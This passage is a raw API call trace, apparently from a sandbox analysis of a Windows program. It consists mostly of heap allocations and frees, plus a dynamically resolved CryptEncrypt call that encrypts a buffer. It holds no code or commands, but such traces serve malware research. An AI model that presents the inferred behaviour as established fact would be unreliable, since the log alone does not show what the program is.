returned 1 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0157.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0157.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0157.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0157.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0157.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0157.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0157.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0157.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0157.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0157.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a88 [0157.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0157.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0157.085] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0157.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0157.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543f0 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0157.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0157.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0157.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0157.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0157.086] CryptEncrypt (in: hKey=0xa87610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f330a8*, pdwDataLen=0x8cef60*=0xa57e, dwBufLen=0xa580 | out: pbData=0x2f330a8*, pdwDataLen=0x8cef60*=0xa580) returned 1 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0157.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0157.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0157.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0157.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0157.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0157.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0157.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0157.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0157.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0157.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0157.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0157.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0157.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0157.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0157.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0157.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0157.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0157.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0157.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0157.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0157.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0157.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0157.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0157.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0157.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0157.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0157.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0157.094] HeapFree (in: 